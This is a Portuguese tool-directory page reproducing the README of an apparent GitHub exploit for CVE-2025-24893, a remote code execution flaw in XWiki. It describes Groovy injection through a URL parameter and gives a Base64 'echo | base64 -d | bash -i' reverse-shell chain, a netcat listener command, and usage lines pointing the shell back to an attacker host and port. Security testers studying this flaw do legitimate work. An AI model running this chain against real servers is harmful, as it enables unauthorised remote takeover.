Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 exploit RCE para XWiki com capacidade de shell reverso | Kitploit
Ferramentas/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 exploit RCE para XWiki com capacidade de shell reverso

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 11 mesesAinda não revisado

Exploit de Reverse Shell para CVE-2025-24893 no XWiki

Aviso: Este script é destinado apenas para fins educacionais e testes de segurança autorizados. Não o utilize em sistemas que você não possua ou para os quais não tenha permissão explícita para testar. O uso indevido pode ser ilegal e perigoso.

Descrição

Este script Python explora a CVE-2025-24893, uma vulnerabilidade de Execução Remota de Código que afeta versões do XWiki até 15.10.10.

  • Versão Testada: XWiki 15.10.8
  • Impacto: Permite a execução de comandos arbitrários no servidor alvo.
  • Versão do Python: Escrito e testado em Python 3

Esta versão estende o PoC original de Al Baradi Joy para gerar um reverse shell. O PoC original pode ser encontrado aqui.

Como Funciona

  • O XWiki executa código Groovy através do parâmetro da URL.

  • O exploit injeta um comando bash -c neste template Groovy.

  • Um reverse shell normal contém várias aspas (' e ") que quebrariam a avaliação do Groovy e a URL.

  • Para resolver isso, o script codifica o comando shell de uma linha em Base64.

  • O payload é então enviado na URL e executado usando a seguinte cadeia:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • Isso decodifica o payload Base64 com segurança e o executa com bash -i, fornecendo um reverse shell interativo.

Formato da URL Alvo

  • Formato: http://<host-alvo>
  • NÃO inclua:
    • Uma barra final / no final
    • O caminho /xwiki (o script o acrescenta automaticamente)

Exemplos:

root@kitploit:~
# Correto
http://10.129.95.114:8080
http://example.com:8080

# Incorreto
http://10.129.95.114:8080/         # barra final
http://example.com/xwiki            # inclui /xwiki

Configuração do Listener

Antes de executar o exploit, você deve iniciar um listener em sua máquina para capturar o reverse shell.

Exemplo usando Netcat:

root@kitploit:~
nc -lvnp <lport>
  • <lport> deve corresponder à porta que você fornece como argumento para o script.

Uso

root@kitploit:~
python3 cve-2025-24893.py <target_base_url> <lhost> <lport>

Exemplo:

root@kitploit:~
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
  • O script exibe a URL completa do exploit, o payload Base64 e instruções para verificar seu listener.

Referências

  • GHSA Advisory
  • XWiki Homepage
  • PoC original por Al Baradi Joy

Créditos

  • Prova de Conceito Original: Al Baradi Joy
  • Esta versão: Atualizada para gerar um reverse shell para execução interativa de comandos

Aviso

  • Use este exploit apenas em ambientes controlados (HTB, máquinas de laboratório, VMs que você possui).
  • O uso não autorizado em servidores públicos é ilegal e pode resultar em acusações criminais.
Baixar ferramenta